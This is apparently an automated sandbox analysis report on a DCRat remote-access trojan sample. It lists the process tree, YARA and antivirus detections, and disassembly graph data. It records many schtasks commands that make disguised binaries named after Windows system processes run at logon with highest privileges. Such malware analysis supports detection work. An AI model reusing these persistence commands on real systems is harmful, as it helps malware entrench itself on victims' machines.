            Start time:19:01:08
            Start date:28/09/2024
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe"
            Imagebase:0xf50000
            File size:147'456 bytes
            MD5 hash:FF00E0480075B095948000BDC66E81F0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:4
            Start time:19:01:08
            Start date:28/09/2024
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\file.vbs"
            Imagebase:0xf50000
            File size:147'456 bytes
            MD5 hash:FF00E0480075B095948000BDC66E81F0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:5
            Start time:19:01:10
            Start date:28/09/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\system32\cmd.exe /c ""C:\reviewDriverIntosessionnet\NRWB62aUrGQ.bat" "
            Imagebase:0x410000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:6
            Start time:19:01:10
            Start date:28/09/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff75da10000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:7
            Start time:19:01:10
            Start date:28/09/2024
            Path:C:\reviewDriverIntosessionnet\comProviderServer.exe
            Wow64 process (32bit):false
            Commandline:"C:\reviewDriverIntosessionnet\comProviderServer.exe"
            Imagebase:0x720000
            File size:2'454'528 bytes
            MD5 hash:DEF21977FE76F2744669724D9A26A39F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1397210421.0000000002E15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1397210421.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1399409242.0000000012C8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            Reputation:low
            Has exited:true

            General

            Target ID:8
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:9
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:10
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:11
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:12
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:13
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:14
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:16
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:17
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Sidebar\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:20
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Downloads\explorer.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:21
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Public\Downloads\explorer.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:23
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\explorer.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:24
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:25
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:26
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows media player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:27
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:28
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:29
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\reviewDriverIntosessionnet\spoolsv.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:30
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 12 /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:31
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:32
            Start time:19:01:13
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 5 /tr "'C:\Users\jones\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:33
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:34
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:35
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:36
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:37
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:38
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 11 /tr "'C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:39
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 14 /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:40
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiy" /sc ONLOGON /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            General

            Target ID:41
            Start time:19:01:14
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "bdoMPjmZJHMIJMdqEctkzcHPTiyb" /sc MINUTE /mo 5 /tr "'C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:9.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:9.4%
              Total number of Nodes:1472
              Total number of Limit Nodes:30
              execution_graph 24811 ba76bd 52 API calls 3 library calls 24812 b816b0 84 API calls 22926 ba90b0 22934 baa56f 22926->22934 22929 ba90c4 22931 ba90cc 22932 ba90d9 22931->22932 22942 ba90e0 11 API calls 22931->22942 22943 baa458 22934->22943 22937 baa5ae TlsAlloc 22938 baa59f 22937->22938 22950 b9ec4a 22938->22950 22940 ba90ba 22940->22929 22941 ba9029 20 API calls 2 library calls 22940->22941 22941->22931 22942->22929 22944 baa484 22943->22944 22945 baa488 22943->22945 22944->22945 22947 baa4a8 22944->22947 22957 baa4f4 22944->22957 22945->22937 22945->22938 22947->22945 22948 baa4b4 GetProcAddress 22947->22948 22949 baa4c4 __crt_fast_encode_pointer 22948->22949 22949->22945 22951 b9ec53 22950->22951 22952 b9ec55 IsProcessorFeaturePresent 22950->22952 22951->22940 22954 b9f267 22952->22954 22964 b9f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22954->22964 22956 b9f34a 22956->22940 22958 baa515 LoadLibraryExW 22957->22958 22962 baa50a 22957->22962 22959 baa54a 22958->22959 22960 baa532 GetLastError 22958->22960 22959->22962 22963 baa561 FreeLibrary 22959->22963 22960->22959 22961 baa53d LoadLibraryExW 22960->22961 22961->22959 22962->22944 22963->22962 22964->22956 22965 baa3b0 22966 baa3bb 22965->22966 22968 baa3e4 22966->22968 22970 baa3e0 22966->22970 22971 baa6ca 22966->22971 22978 baa410 DeleteCriticalSection 22968->22978 22972 baa458 __dosmaperr 5 API calls 22971->22972 22973 baa6f1 22972->22973 22974 baa6fa 22973->22974 22975 baa70f InitializeCriticalSectionAndSpinCount 22973->22975 22976 b9ec4a ___delayLoadHelper2@8 5 API calls 22974->22976 22975->22974 22977 baa726 22976->22977 22977->22966 22978->22970 24813 ba1eb0 6 API calls 4 library calls 24864 ba79b7 55 API calls _free 24815 b896a0 79 API calls 24866 bae9a0 51 API calls 24818 b9e4a2 38 API calls 2 library calls 24819 b8ea98 FreeLibrary 24820 b9a89d 78 API calls 23069 b9d891 19 API calls ___delayLoadHelper2@8 24821 b97090 114 API calls 24822 b9cc90 70 API calls 24868 b9a990 97 API calls 24869 b99b90 GdipCloneImage GdipAlloc 24870 ba9b90 21 API calls 2 library calls 24871 ba2397 48 API calls 23072 b9d997 23073 b9d89b 23072->23073 23074 b9df59 ___delayLoadHelper2@8 19 API calls 23073->23074 23074->23073 24873 ba5780 QueryPerformanceFrequency QueryPerformanceCounter 23272 b81385 82 API calls 3 library calls 23274 b9e1f9 23275 b9e203 23274->23275 23276 b9df59 ___delayLoadHelper2@8 19 API calls 23275->23276 23277 b9e210 23276->23277 24826 ba14f8 RaiseException 24875 b9ebf7 20 API calls 23328 b9aee0 23329 b9aeea __EH_prolog 23328->23329 23491 b8130b 23329->23491 23332 b9b5cb 23563 b9cd2e 23332->23563 23333 b9af2c 23336 b9af39 23333->23336 23337 b9afa2 23333->23337 23399 b9af18 23333->23399 23341 b9af3e 23336->23341 23342 b9af75 23336->23342 23340 b9b041 GetDlgItemTextW 23337->23340 23346 b9afbc 23337->23346 23338 b9b5e9 SendMessageW 23339 b9b5f7 23338->23339 23344 b9b611 GetDlgItem SendMessageW 23339->23344 23345 b9b600 SendDlgItemMessageW 23339->23345 23340->23342 23343 b9b077 23340->23343 23352 b8ddd1 53 API calls 23341->23352 23341->23399 23347 b9af96 KiUserCallbackDispatcher 23342->23347 23342->23399 23348 b9b08f GetDlgItem 23343->23348 23349 b9b080 23343->23349 23581 b99da4 GetCurrentDirectoryW 23344->23581 23345->23344 23351 b8ddd1 53 API calls 23346->23351 23347->23399 23354 b9b0c5 SetFocus 23348->23354 23355 b9b0a4 SendMessageW SendMessageW 23348->23355 23349->23342 23364 b9b56b 23349->23364 23356 b9afde SetDlgItemTextW 23351->23356 23357 b9af58 23352->23357 23353 b9b641 GetDlgItem 23359 b9b65e 23353->23359 23360 b9b664 SetWindowTextW 23353->23360 23361 b9b0d5 23354->23361 23372 b9b0ed 23354->23372 23355->23354 23362 b9afec 23356->23362 23603 b81241 SHGetMalloc 23357->23603 23359->23360 23582 b9a2c7 GetClassNameW 23360->23582 23366 b8ddd1 53 API calls 23361->23366 23370 b9aff9 GetMessageW 23362->23370 23362->23399 23363 b9af5f 23367 b9af63 SetDlgItemTextW 23363->23367 23363->23399 23368 b8ddd1 53 API calls 23364->23368 23371 b9b0df 23366->23371 23367->23399 23373 b9b57b SetDlgItemTextW 23368->23373 23375 b9b010 IsDialogMessageW 23370->23375 23370->23399 23604 b9cb5a 23371->23604 23380 b8ddd1 53 API calls 23372->23380 23377 b9b58f 23373->23377 23375->23362 23379 b9b01f TranslateMessage DispatchMessageW 23375->23379 23383 b8ddd1 53 API calls 23377->23383 23379->23362 23382 b9b124 23380->23382 23381 b9b6af 23385 b9b6df 23381->23385 23390 b8ddd1 53 API calls 23381->23390 23386 b8400a _swprintf 51 API calls 23382->23386 23387 b9b5b8 23383->23387 23384 b9bdf5 98 API calls 23384->23381 23398 b9bdf5 98 API calls 23385->23398 23440 b9b797 23385->23440 23391 b9b136 23386->23391 23392 b8ddd1 53 API calls 23387->23392 23388 b9b0e6 23501 b8a04f 23388->23501 23396 b9b6c2 SetDlgItemTextW 23390->23396 23397 b9cb5a 16 API calls 23391->23397 23392->23399 23394 b9b17f 23507 b9a322 SetCurrentDirectoryW 23394->23507 23395 b9b174 GetLastError 23395->23394 23404 b8ddd1 53 API calls 23396->23404 23397->23388 23405 b9b6fa 23398->23405 23400 b9b847 23401 b9b859 23400->23401 23402 b9b850 EnableWindow 23400->23402 23406 b9b876 23401->23406 23622 b812c8 GetDlgItem EnableWindow 23401->23622 23402->23401 23408 b9b6d6 SetDlgItemTextW 23404->23408 23414 b9b70c 23405->23414 23428 b9b731 23405->23428 23413 b9b89d 23406->23413 23421 b9b895 SendMessageW 23406->23421 23407 b9b195 23411 b9b19e GetLastError 23407->23411 23412 b9b1ac 23407->23412 23408->23385 23410 b9b78a 23416 b9bdf5 98 API calls 23410->23416 23411->23412 23420 b9b227 23412->23420 23425 b9b237 23412->23425 23426 b9b1c4 GetTickCount 23412->23426 23413->23399 23422 b8ddd1 53 API calls 23413->23422 23620 b99635 32 API calls 23414->23620 23415 b9b86c 23623 b812c8 GetDlgItem EnableWindow 23415->23623 23416->23440 23418 b9b725 23418->23428 23424 b9b46c 23420->23424 23420->23425 23421->23413 23423 b9b8b6 SetDlgItemTextW 23422->23423 23423->23399 23523 b812e6 GetDlgItem ShowWindow 23424->23523 23430 b9b24f GetModuleFileNameW 23425->23430 23431 b9b407 23425->23431 23432 b8400a _swprintf 51 API calls 23426->23432 23427 b9b825 23621 b99635 32 API calls 23427->23621 23428->23410 23435 b9bdf5 98 API calls 23428->23435 23614 b8eb3a 80 API calls 23430->23614 23431->23342 23444 b8ddd1 53 API calls 23431->23444 23438 b9b1dd 23432->23438 23434 b8ddd1 53 API calls 23434->23440 23441 b9b75f 23435->23441 23436 b9b47c 23524 b812e6 GetDlgItem ShowWindow 23436->23524 23508 b8971e 23438->23508 23439 b9b844 23439->23400 23440->23400 23440->23427 23440->23434 23441->23410 23445 b9b768 DialogBoxParamW 23441->23445 23443 b9b275 23447 b8400a _swprintf 51 API calls 23443->23447 23448 b9b41b 23444->23448 23445->23342 23445->23410 23446 b9b486 23451 b8ddd1 53 API calls 23446->23451 23452 b9b297 CreateFileMappingW 23447->23452 23449 b8400a _swprintf 51 API calls 23448->23449 23453 b9b439 23449->23453 23455 b9b490 SetDlgItemTextW 23451->23455 23456 b9b2f9 GetCommandLineW 23452->23456 23486 b9b376 __vswprintf_c_l 23452->23486 23468 b8ddd1 53 API calls 23453->23468 23454 b9b203 23458 b9b215 23454->23458 23459 b9b20a GetLastError 23454->23459 23525 b812e6 GetDlgItem ShowWindow 23455->23525 23457 b9b30a 23456->23457 23615 b9ab2e SHGetMalloc 23457->23615 23516 b89653 23458->23516 23459->23458 23460 b9b381 ShellExecuteExW 23481 b9b39e 23460->23481 23462 b9b4a2 SetDlgItemTextW GetDlgItem 23465 b9b4bf GetWindowLongW SetWindowLongW 23462->23465 23466 b9b4d7 23462->23466 23465->23466 23526 b9bdf5 23466->23526 23467 b9b326 23616 b9ab2e SHGetMalloc 23467->23616 23468->23342 23472 b9b332 23617 b9ab2e SHGetMalloc 23472->23617 23473 b9b3e1 23473->23431 23480 b9b3f7 UnmapViewOfFile CloseHandle 23473->23480 23474 b9bdf5 98 API calls 23476 b9b4f3 23474->23476 23551 b9d0f5 23476->23551 23477 b9b33e 23618 b8ecad 80 API calls ___scrt_fastfail 23477->23618 23480->23431 23481->23473 23484 b9b3cd Sleep 23481->23484 23483 b9b355 MapViewOfFile 23483->23486 23484->23473 23484->23481 23485 b9bdf5 98 API calls 23489 b9b519 23485->23489 23486->23460 23487 b9b542 23619 b812c8 GetDlgItem EnableWindow 23487->23619 23489->23487 23490 b9bdf5 98 API calls 23489->23490 23490->23487 23492 b8136d 23491->23492 23493 b81314 23491->23493 23625 b8da71 GetWindowLongW SetWindowLongW 23492->23625 23495 b8137a 23493->23495 23624 b8da98 62 API calls 2 library calls 23493->23624 23495->23332 23495->23333 23495->23399 23497 b81336 23497->23495 23498 b81349 GetDlgItem 23497->23498 23498->23495 23499 b81359 23498->23499 23499->23495 23500 b8135f SetWindowTextW 23499->23500 23500->23495 23504 b8a059 23501->23504 23502 b8a113 23502->23394 23502->23395 23503 b8a0ea 23503->23502 23505 b8a207 9 API calls 23503->23505 23504->23502 23504->23503 23626 b8a207 23504->23626 23505->23502 23507->23407 23509 b89728 23508->23509 23510 b89792 CreateFileW 23509->23510 23511 b89786 23509->23511 23510->23511 23512 b897e4 23511->23512 23513 b8b66c 2 API calls 23511->23513 23512->23454 23514 b897cb 23513->23514 23514->23512 23515 b897cf CreateFileW 23514->23515 23515->23512 23517 b89688 23516->23517 23518 b89677 23516->23518 23517->23420 23518->23517 23519 b8968a 23518->23519 23520 b89683 23518->23520 23652 b896d0 23519->23652 23647 b89817 23520->23647 23523->23436 23524->23446 23525->23462 23527 b9bdff __EH_prolog 23526->23527 23528 b9b4e5 23527->23528 23529 b9aa36 ExpandEnvironmentStringsW 23527->23529 23528->23474 23540 b9be36 _wcsrchr 23529->23540 23531 b9aa36 